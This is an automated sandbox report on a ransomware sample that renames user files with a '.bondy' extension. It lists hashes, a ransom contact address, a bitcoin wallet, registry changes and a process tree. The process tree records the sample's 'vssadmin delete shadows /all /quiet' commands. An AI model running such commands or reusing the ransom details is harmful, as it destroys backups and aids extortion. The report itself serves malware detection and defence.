Analysis
- max time kernel: 148s
- max time network: 150s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 30-10-2020 05:07

Static task: static1
Behavioral task: behavioral1
- Sample: 6.exe_.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 6.exe_.exe
- Resource: win10v20201028
General
- Target: 6.exe_.exe
- Size: 26KB
- MD5: 0f0d5631cc8749e8a8a2f61ca909dcfc
- SHA1: ee79e938a80d1d0a955899f56d5f8f37bee38de0
- SHA256: e404f26379df9df89844dbd55120dccf383c3b793e0f08d84ee40f82d0cc334a
- SHA512: 5b1560a5029155519af379cf9d0cce82a0d96fe7fb6af3888310a83fd45ac32ee9dd110f43721cd2313cb33fee9739bf86470b3083c5c4b75a74837a19bc0b0c
Malware Config
Extracted from: C:\Users\Admin\Pictures\HELP_DECRYPT_YOUR_FILES.txt
- bondbond1@protonmail.com
- 3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq
Signatures
-
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files (2 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: 6.exe_.exe
description | ioc | process
File renamed | C:\Users\Admin\Pictures\MoveDisable.raw => C:\Users\Admin\Pictures\MoveDisable.raw.bondy | 6.exe_.exe
File renamed | C:\Users\Admin\Pictures\StartEnter.raw => C:\Users\Admin\Pictures\StartEnter.raw.bondy | 6.exe_.exe
-
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
-
Modifies service (2 TTPs, 5 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
-
Interacts with shadow copies (2 TTPs, 2 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe, vssadmin.exe
pid | process
1292 | vssadmin.exe
1560 | vssadmin.exe
-
Modifies Internet Explorer settings
Processes: iexplore.exe, IEXPLORE.EXE
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c003f99382aed601 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000d3019773f99e1c8a5fbf0835145579c1b17366ac8ed1407f1b3d512d7697c0c8000000000e8000000002000020000000c8e7bf8b381f5892498333881644ab03199fc25e0f3f84bb0acb931f6df630a9200000009fb99c4e1c13f6fec1cfc35ef9575399d8a2e01c1097a96eb8b171f71c536154400000007a020abab0864b4d1a1297d7f90d26a6d7f52cea183d76cc52d33f3517641ea7f9a28c0ea8eec3a7c0c65d5ae18994faa421afff44c48dd7e6b02e506eb86ff3 | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "310802827" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value removed] | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BADDAAA1-1A75-11EB-A3A5-424ABE5A776C} = "0" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
-
Modifies registry key (1 TTPs, 1 IoCs)
-
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes: iexplore.exe
pid | process
848 | iexplore.exe
-
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: vssvc.exe
description | pid | process
Token: SeBackupPrivilege | 1956 | vssvc.exe
Token: SeRestorePrivilege | 1956 | vssvc.exe
Token: SeAuditPrivilege | 1956 | vssvc.exe
-
Suspicious use of FindShellTrayWindow (1 IoCs)
Processes: iexplore.exe
pid | process
848 | iexplore.exe
-
Suspicious use of SetWindowsHookEx (6 IoCs)
Processes: iexplore.exe, IEXPLORE.EXE
pid | process
848 | iexplore.exe
848 | iexplore.exe
760 | IEXPLORE.EXE
760 | IEXPLORE.EXE
760 | IEXPLORE.EXE
760 | IEXPLORE.EXE
-
Suspicious use of WriteProcessMemory (25 IoCs)
Processes: 6.exe_.exe, cmd.exe, cmd.exe, cmd.exe, iexplore.exe
description | pid | process | target process
PID 1688 wrote to memory of 1168 | 1688 | 6.exe_.exe | cmd.exe
PID 1688 wrote to memory of 1168 | 1688 | 6.exe_.exe | cmd.exe
PID 1688 wrote to memory of 1168 | 1688 | 6.exe_.exe | cmd.exe
PID 1688 wrote to memory of 1028 | 1688 | 6.exe_.exe | cmd.exe
PID 1688 wrote to memory of 1028 | 1688 | 6.exe_.exe | cmd.exe
PID 1688 wrote to memory of 1028 | 1688 | 6.exe_.exe | cmd.exe
PID 1028 wrote to memory of 1292 | 1028 | cmd.exe | vssadmin.exe
PID 1028 wrote to memory of 1292 | 1028 | cmd.exe | vssadmin.exe
PID 1028 wrote to memory of 1292 | 1028 | cmd.exe | vssadmin.exe
PID 1168 wrote to memory of 2000 | 1168 | cmd.exe | reg.exe
PID 1168 wrote to memory of 2000 | 1168 | cmd.exe | reg.exe
PID 1168 wrote to memory of 2000 | 1168 | cmd.exe | reg.exe
PID 1688 wrote to memory of 1712 | 1688 | 6.exe_.exe | cmd.exe
PID 1688 wrote to memory of 1712 | 1688 | 6.exe_.exe | cmd.exe
PID 1688 wrote to memory of 1712 | 1688 | 6.exe_.exe | cmd.exe
PID 1712 wrote to memory of 1560 | 1712 | cmd.exe | vssadmin.exe
PID 1712 wrote to memory of 1560 | 1712 | cmd.exe | vssadmin.exe
PID 1712 wrote to memory of 1560 | 1712 | cmd.exe | vssadmin.exe
PID 1688 wrote to memory of 848 | 1688 | 6.exe_.exe | iexplore.exe
PID 1688 wrote to memory of 848 | 1688 | 6.exe_.exe | iexplore.exe
PID 1688 wrote to memory of 848 | 1688 | 6.exe_.exe | iexplore.exe
PID 848 wrote to memory of 760 | 848 | iexplore.exe | IEXPLORE.EXE
PID 848 wrote to memory of 760 | 848 | iexplore.exe | IEXPLORE.EXE
PID 848 wrote to memory of 760 | 848 | iexplore.exe | IEXPLORE.EXE
PID 848 wrote to memory of 760 | 848 | iexplore.exe | IEXPLORE.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\6.exe_.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\6.exe_.exe"
  - Modifies extensions of user files
  - Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\System32\reg.exe (depth 3)
      Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
      - Modifies registry key
-
  C:\Windows\system32\cmd.exe (depth 2)
    Command line: "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\system32\vssadmin.exe (depth 3)
      Command line: vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies
-
  C:\Windows\system32\cmd.exe (depth 2)
    Command line: "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\system32\vssadmin.exe (depth 3)
      Command line: vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies
-
  C:\Program Files\Internet Explorer\iexplore.exe (depth 2)
    Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://2no.co/1SHYt7
    - Modifies Internet Explorer settings
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
-
    C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (depth 3)
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:848 CREDAT:275457 /prefetch:2
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5: 191719adfa0a348195c83103586b5905
SHA1: fbc775b9f645124b1dd37f1eab7087b1a5d0bf57
SHA256: ee4b7ef74bf224d4d0cb065ce94d9dddb574f70e7afb3aaf5bf4b7bf53c0a983
SHA512: 9bdc8de49869b23e64aa2867207d5dda36a1b714c8b0b1647411e57cfe485414685b1a120a7ea73a71e230384b3fdc25282edf6d370011312a528460815082de
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\s7iy1jn\imagestore.dat
MD5: c61cd898b477ed17e75cec6f6471813d
SHA1: 40011d808c0282ce8adb9e2c6c6e831aa3bbc67b
SHA256: af4dadc1cfc2f4db490ec7b66e36587b18ad3e7ac2582f336dac91127d3c54c9
SHA512: ab9541be776005fd270ac71ab1cc4bbc9dbed1e5c5db35b0dfefae43dd3439c0595271da5aad2323c630fe6749a2397a3649194a49f8d79a7c0ba39c996a847d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CWT9VBTE.txt
MD5: 71c3c45b5899fd410c5af50a95735b92
SHA1: efe186d8d83d2897ac966a08724ea5ac9b59f84c
SHA256: 658f10e1f39a02f3a715d3b50af114088cd85d4129de05dbc253bf31cb7a1300
SHA512: 241eeb763a3af9f0745f09eab158870b44e13a8a4f58a86d76ccbbe516419557c4e3315f00973294cd1a92e3f3139f53fb30ff65836fe9dae75d2d1ff339434c
-
memory/760-11-0x0000000000000000-mapping.dmp
-
memory/848-9-0x0000000000000000-mapping.dmp
-
memory/900-10-0x000007FEF5350000-0x000007FEF55CA000-memory.dmp
Filesize: 2.5MB
-
memory/1028-4-0x0000000000000000-mapping.dmp
-
memory/1168-3-0x0000000000000000-mapping.dmp
-
memory/1292-5-0x0000000000000000-mapping.dmp
-
memory/1560-8-0x0000000000000000-mapping.dmp
-
memory/1688-0-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp
Filesize: 9.9MB
-
memory/1688-1-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
Filesize: 4KB
-
memory/1712-7-0x0000000000000000-mapping.dmp
-
memory/2000-6-0x0000000000000000-mapping.dmp